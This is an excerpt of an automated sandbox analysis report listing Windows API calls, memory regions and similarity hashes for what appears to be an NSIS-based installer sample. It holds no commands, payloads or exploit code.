                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                    • String ID:
                                                                                                    • API String ID: 4115351271-0
                                                                                                    • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                                                                    • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                                                                    • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                    • Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
                                                                                                    • Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
                                                                                                    • Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 973152223-0
                                                                                                    • Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                    • Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
                                                                                                    • Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
                                                                                                    • Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C
                                                                                                    APIs
                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3850602802-0
                                                                                                    • Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                    • Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
                                                                                                    • Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
                                                                                                    • Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                    • Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
                                                                                                    • Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
                                                                                                    • Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                                                                    • DeleteObject.GDI32(?), ref: 00404A79
                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F5B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                    • String ID: $ @$M$N
                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                    • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                                                                    • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                                                                    • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00404583
                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                                                                    • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                                                                    • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                                                                      • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                      • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                      • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                      • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F
                                                                                                    • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                    • String ID: 82D$@%F$@rD$A
                                                                                                    • API String ID: 3347642858-1086125096
                                                                                                    • Opcode ID: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                                                                    • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                                                                    • Opcode Fuzzy Hash: ae95d19a650443c120af7248ec578161461b31874b4e5badf60a47e74a1ad680
                                                                                                    • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004071E6
                                                                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                    • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                                                                    • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                                                                    • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                                                                    APIs
                                                                                                    • DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
                                                                                                    • lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
                                                                                                    • lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                                                                    • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                                                                    • FindClose.KERNEL32(?), ref: 00406E33
                                                                                                    Strings
                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                                                                    • \*.*, xrefs: 00406D03
                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                                                                    • API String ID: 2035342205-3294556389
                                                                                                    • Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                    • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                                                                    • Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
                                                                                                    • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                    • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                                                                      • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                    • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                                                                    • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                                                                    • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                    • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                    • API String ID: 3581403547-784952888
                                                                                                    • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                                                                    • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                                                                    • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                                                                    Strings
                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateInstance
                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                    • API String ID: 542301482-1377821865
                                                                                                    • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                                                                    • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                                                                    • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352037422.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352125885.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_3_2_400000_RobertsonDeclined.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFindFirst
                                                                                                    • String ID:
                                                                                                    • API String ID: 1974802433-0
                                                                                                    • Opcode ID: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                    • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                                                                    • Opcode Fuzzy Hash: 005be0a9498432eb51f9697d6085e84733c01c19a866f8c94ce5140aa3afdc34
                                                                                                    • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063CC
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                                                                      • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004064DD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000003.00000002.1351996044.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000003.00000002.1351975024.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
